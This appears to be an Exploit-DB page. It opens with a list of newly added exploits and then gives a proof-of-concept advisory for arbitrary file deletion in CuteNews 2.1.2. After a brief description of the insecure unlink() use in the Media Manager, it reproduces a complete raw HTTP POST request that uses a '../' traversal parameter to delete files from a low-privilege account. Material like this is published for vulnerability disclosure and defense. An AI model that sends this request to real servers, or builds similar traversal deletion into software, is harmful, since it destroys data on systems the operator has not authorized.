
14 changes to exploits/shellcodes SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions Pi-hole < 4.4 - Authenticated Remote Code Execution Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection Kartris 1.6 - Arbitrary File Upload Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting CuteNews 2.1.2 - Arbitrary File Deletion OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting Victor CMS 1.0 - 'post' SQL Injection Complaint Management System 1.0 - Authentication Bypass LibreNMS 1.46 - 'search' SQL Injection
37 lines
No EOL
1.5 KiB
Text
37 lines
No EOL
1.5 KiB
Text
# Exploit Title: CuteNews 2.1.2 - Arbitrary File Deletion
|
|
# Date: 2020-05-08
|
|
# Author: Besim ALTINOK
|
|
# Vendor Homepage: https://cutephp.com
|
|
# Software Link: https://cutephp.com/click.php?cutenews_latest
|
|
# Version: v2.1.2 (Maybe it affect other versions)
|
|
# Tested on: Xampp
|
|
# Credit: İsmail BOZKURT
|
|
# Remotely: Yes
|
|
|
|
Description:
|
|
------------------------------------------------------------------------
|
|
In the "Media Manager" area, users can do arbitrarily file deletion.
|
|
Because the developer did not use the unlink() function as secure. So, can
|
|
be triggered this vulnerability by a low user account
|
|
|
|
|
|
Arbitrary File Deletion PoC
|
|
--------------------------------------------------------------------------------
|
|
|
|
POST /cute/index.php HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 **********************************
|
|
Accept:
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 222
|
|
Origin: http://localhost
|
|
DNT: 1
|
|
Connection: close
|
|
Referer: http://localhost/cute/index.php
|
|
Cookie: CUTENEWS_SESSION=3f6a6ea7089e3a6a04b396d382308022
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=27966e9129793e80a70089ee1c3ebfd5-tester&__signature_dsi=0ad6659c2aa31871b0b44617cf0b1200&rm%5B%5D=../avatar.png&do_action=delete |